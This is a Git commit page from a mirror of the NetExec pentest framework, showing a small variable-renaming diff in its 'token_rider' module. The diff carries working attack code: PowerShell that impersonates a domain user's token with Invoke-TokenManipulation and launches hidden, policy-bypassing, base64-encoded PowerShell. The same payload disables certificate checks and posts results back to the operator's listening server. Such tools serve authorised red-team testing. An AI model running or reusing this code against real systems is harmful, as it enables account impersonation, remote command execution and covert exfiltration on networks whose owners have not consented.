swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

changed var names in token_rider module

main
byt3bl33d3r 2016-09-26 13:47:36 -06:00
parent 3d50982bfa
commit b1e8322704
1 changed files with 3 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
cme/modules/token_rider.py
View File

@ -103,12 +103,12 @@ class CMEModule:
$post_back = $post_back + $token_desc; $post_back = $post_back + $token_desc;
Send-POSTRequest $post_back Send-POSTRequest $post_back
Invoke-TokenManipulation -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {command}"; Invoke-TokenManipulation -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {second_stage}";
return return
}} }}
}} }}
Send-POSTRequest "User token not present on system!"'''.format(command=b64encode(second_stage.encode('UTF-16LE')), Send-POSTRequest "User token not present on system!"'''.format(second_stage=b64encode(second_stage.encode('UTF-16LE')),
server=context.server, server=context.server,
addr=context.localip, addr=context.localip,
port=context.server_port, port=context.server_port,
@ -118,9 +118,6 @@ class CMEModule:
return create_ps_command(launcher) return create_ps_command(launcher)
def payload(self, context, command): def payload(self, context, command):
command_to_execute = 'cmd.exe /c {}'.format(command)
#context.log.debug(command_to_execute)
#This will get executed in the process that was created with the impersonated token #This will get executed in the process that was created with the impersonated token
payload = ''' payload = '''
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
@ -154,7 +151,7 @@ class CMEModule:
addr=context.localip, addr=context.localip,
port=context.server_port, port=context.server_port,
targets=self.target_computers, targets=self.target_computers,
command=command_to_execute) command=command)
return payload return payload